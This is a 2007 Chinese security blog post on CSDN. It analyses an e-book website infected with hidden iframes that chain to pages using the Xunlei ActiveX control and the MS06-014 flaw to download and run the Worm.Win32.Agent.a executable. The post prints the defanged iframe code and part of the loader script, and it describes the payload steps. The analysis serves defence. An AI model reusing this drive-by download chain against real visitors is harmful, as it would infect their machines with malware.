利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站

最新推荐文章于 2024-10-15 09:57:04 发布
最新推荐文章于 2024-10-15 09:57:04 发布
阅读量1.6k 收藏
点赞数
分类专栏: 系统安全 文章标签: iframe javascript 解密 function ie 脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1671977
版权

endurer 原创
2007-06-29 第1

浏览该网站时,Kaspersky报告:恶意脚本: 拒绝访问。

检查该网页,发现代码:
/---
<iframe src=hxxp://x*x*.k*o*5***1.com/index.htm width=50 height=0></iframe>
---/

hxxp://x*x*.k*o*5***1.com/index.htm 包含代码:
/---
<iframe src="hxxp://x*x*.k*o*5***1.com/vip.htm" height=0 width=0></iframe>
<iframe src="hxxp://x*x*.k*o*5***1.com/vip1.htm" height=0 width=0></iframe>
<iframe src="hxxp://x*x*.k*o*5***1.com/vip2.htm" height=0 width=0></iframe>
---/

hxxp://x*x*.k*o*5***1.com/vip.htm 内容为:
/---
<SCRIPT src="vip.js"></SCRIPT>
<BODY οnlοad=shit();><BR><BR>
---/

shit()定义在vip.js中:
/---
function shit()
{
 try{qianxu_fan = new ActiveXObject("ThunderServer.webThunder.1");}
 catch(e){return;}
---/

用来创建ActiveXObject"ThunderServer.webThunder.1"。

vip.js 利用它来的实施:
利用ADODB创建文件:C:/Documents and Settings/All Users/「开始」菜单/程序/启动/microsofts.hta
利用Shell.Run调用IE打开网页 hxxp://www.mv***ps*f.com/kl/vip.exevips.htm,下载病毒文件vip.exe
利用shell.exec运行下载到IE临时文件夹中的病毒文件vip[1].exe

文件说明符 : D:/test/vip.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-29 21:34:52
修改时间 : 2007-6-29 21:34:54
访问时间 : 2007-6-29 0:0:0
大小 : 191972 字节 187.484 KB
MD5 : 1ac930db8829397b86517eae9cc56c0e

瑞星报为:Worm.Win32.Agent.a

hxxp://x*x*.k*o*5***1.com/vip1.htm 内容为US-ASCII编码。到 http://purpleendurer.ys168.com 下载US-ASCII编码解码程序进行解密,得到JavaScript代码,功能是下载 kl.exe,保存为 c:/Microsoft.com,利用 ShelL.Application 运行。

view-source:hxxp://x*x*.k*o*5***1.com/vip2.htm内容为US-ASCII编码。解密得到JavaScript代码,功能是利用MS06014漏洞下载 kl.exe,保存为 c:/Microsoft.com,并创建 Microsoft.vbs,来运行。

kl.exe 已不存在。 

紫郢剑侠
关注
专栏目录
ms06014漏洞分析
zzg810314
04-08 706
IE MS06014漏洞share一下
10-25 468
密码:    Option Explicit    function Decode(k)        dim s,t,i        s=Split(k," ")        t=""        For i = 0 To UBound(s)        t=t+Chr(s(i))        Next        Decode=t    End Function         
迅雷最新版本存在严重的远程拒绝服务漏洞(0day)
weixin_33905756的博客
04-24 171
转载的摘要:迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户.迅雷5的ThunderAgent_005.dll中注册了一个activex 控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃.From:[url]http://www.ph4nt0m.or...
信息安全技术 实验四 木马及远程控制技术
weixin_30399055的博客
11-29 808
信息安全技术 实验四 木马及远程控制技术 实验报告 实验名称: 木马及远程控制技术 姓名: 杨笛、辜彦霖 学号: 20155217、20155227 班级: 1552 日期: 2017.11.21 一、实验目的与要求: 1.剖析网页木马的工作原理 2.理解木马的植入过程 3.学会编写简单的网页木马脚本 4.通过分析监控信息实现手动删除木马 二、实验原理 1.网页木马原理 网页木马...
CVE-2009-0927漏洞分析
AlexYoung28的博客
08-09 2180
1 CVE-2009-0927简介 Adobe Reader 是非常流行的 PDF 文件阅读器,在其 Collab 对象的 getIcon()函数中存在一 个缓冲区溢出漏洞。同时由于 PDF 文档中支持内嵌的 JavaScript,攻击者可以通过在 PDF 文档 中植入恶意的JavaScript来向getIcon()函数传递特制的参数以触发溢出漏洞,并结合Heap Spray 攻...
病毒之Worm.Win32.AutoRun
BYTEDANCE的博客
12-16 5060
解决Worm.Win32.AutoRun之暴力删除 Autorun.inf 文件,那年我双手插兜,不知道什么叫做对手
Net-Worm.Win32.Kido.ih 专杀工具
06-07
Net-Worm.Win32.Kido.ih 是一种广泛传播的蠕虫病毒,它主要通过网络进行扩散,对用户的计算机系统安全构成严重威胁。这个病毒能够影响Windows操作系统,导致各种问题,比如网络连接受阻,尤其是可能导致无法访问微软...
net.worm.win32.kido专杀工具
06-25
手动移除方法 ...1、删除如下注册表项: [HKLM\SYSTEM\CurrentControlSet\Services\netsvcs] 2、从系统注册表项中删除如下所示"%System%\<rnd>.dll": ...更新您的防病毒数据库和执行完整扫描计算机
delphi Email-Worm.Win32.Canbis
05-02
delphi Email-Worm.Win32.Canbis
Net-Worm.Win32.Kido 专杀
02-18
Net-Worm.Win32.Kido 专杀
bat.worm.muma.rar_WORM
09-20
标题中的“bat.worm.muma.rar_WORM”指的是一个蠕虫病毒,该病毒主要通过BAT(批处理)文件传播。蠕虫病毒是一种自我复制的恶意软件,能够在计算机网络中独立移动,无需人为干预,通常通过电子邮件、即时消息、下载...
对一个挂马网页的简单分析
magictong的专栏
11-29 2606
【注意:下面的任意网址都不要在浏览器中直接访问】 对挂马网址http://www.may925.com/news.asp?id=58 的分析 分析人:magictong 日期:2008/11/26 利用漏洞:1、Microsoft Office Snapshot Viewer ActiveX 漏洞2、MS06014漏洞3、新浪UC DLoader Class
20155301、20155339《信息安全技术》实验四 木马及远程控制技术
weixin_34203832的博客
11-28 408
20155301、20155339《信息安全技术》实验四 木马及远程控制技术 实验目的 1)剖析网页木马的工作原理 2)理解木马的植入过程 3)学会编写简单的网页木马脚本 4)通过分析监控信息实现手动删除木马 实验内容 1)木马生成与植入 2)利用木马实现远程控制 3)木马的删除 实验人数 1)每组2人,本组为20155301、20155339 实验主机 | 实验角色 ---|--- 主机A | ...
【JAVA开源】基于Vue和SpringBoot的高校学科竞赛平台
杨荧的CSDN博客
10-10 1469
教师功能有个人中心,题目类型管理,竞赛题库管理,竞赛类型管理,竞赛信息管理,报名信息管理,竞赛评分管理,参赛名单管理,晋级名单管理,获奖名单管理,竞赛总结管理,报销清单管理,成绩申诉管理,参赛信息管理,参赛信息管理,往年成绩管理,获奖情况管理。
使用 Redis 在 Spring Boot 中实现排行榜功能
fudaihb的博客
10-10 1594
在现代的应用程序中,排行榜功能广泛应用于游戏、社交网络、电商等领域,用于展示用户的排名情况。为了在大并发的环境下快速、高效地实现排行榜功能,Redis 提供了强大的数据结构 `Sorted Set`(有序集合),能够以 O(log N) 的时间复杂度进行元素插入和查询,非常适合排行榜这种场景。 本文将详细介绍如何在 Spring Boot 中使用 Redis 实现排行榜功能。我们将介绍 Redis 的 `Sorted Set` 数据结构,结合具体代码演示如何实现排行榜的增、删、查、改,并讨论排行榜的一些
npm 和 npx 的区别和使用场景
Dou_Hua6的博客
10-09 700
自动下载和缓存:如果本地未安装所需包,npx会自动下载并执行,执行完毕后可以选择保留或删除。脚本运行:通过package.json中的scripts字段定义和运行自定义脚本。依赖管理:管理项目的dependencies和devDependencies。简化命令行工具的使用:临时执行命令,避免全局安装带来的版本冲突或污染。npm 全称:Node Package Manager。发布包:将自己的包发布到npm注册表供他人使用。:无需全局安装即可运行npm包中的可执行文件。
JavaScript】移动色块案例 实现一个可以拖动并且在拖动过程中会自动改变颜色的色块(JS 事件监听器)
m0_66584716的博客
10-11 1341
- **移动色块**:用户可以通过鼠标按住并拖动页面上的红色方块(`#blocks`)。当用户按下鼠标左键时,色块开始跟随鼠标的移动而移动;当用户释放鼠标左键时,色块停止移动。 - **显示当前位置**:随着色块的移动,其当前的屏幕坐标(相对于浏览器窗口)会被实时更新,并显示在页面底部左侧的位置显示区域(`#positionDisplay`)中。 - **自动变色**:一旦用户开始拖动色块,系统就会每隔300毫秒随机改变一次色块的颜色。颜色的变化是通过调用 `getRandomColor()` 函数生成一个
ECMAScript标准解析及其发展历史与技术演进
最新发布
qq_20245171的博客
10-15 595
ECMAScript(简称ES)是由ECMA国际(欧洲计算机制造商协会)制定的一种脚本语言规范。它是JavaScript、JScript等语言的基础,并为现代Web开发提供了强大的支持。ECMAScript标准不仅定义了语言的语法和语义,还涵盖了数据类型、对象模型和执行环境等内容,极大推动了JavaScript语言的发展。本文将全面介绍ECMAScript标准的起源、各个版本的演变、关键特性以及未来趋势,深入探讨其对Web开发及编程语言设计的影响。
Element-plus el-form、el-dialog 数据回显同时用时,重置失效问题
Mr. Zhang Xiaojian's Blog
10-12 526
当第一次打开网页并点击“编辑”按钮时,虽然对话框变量变为 true 使对话框可见,但同步代码会将 formData 对象的属性设置为默认值。由于 Vue 的异步更新机制,DOM 实际上还未更新,因此表单组件内绑定了这些有值的初始数据。这样,在后续调用 resetFields 方法时,表单将会重置为这些默认值而不是空值。编辑时表单的初始值被设置成了回显的数据,而不是空字符串。时,表单会回到上次设置的初始值,即回显的数据。
worm_down ad.ad病毒清除策略与微软补丁应用
而其他电脑可能是Windows XP Professional SP2或SP3,因此推荐安装微软的08-067补丁,这是一个针对特定漏洞的安全更新,可能有助于抵御worm_downad.ad病毒的进一步传播。具体补丁选择需要根据系统的兼容性进行确认。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值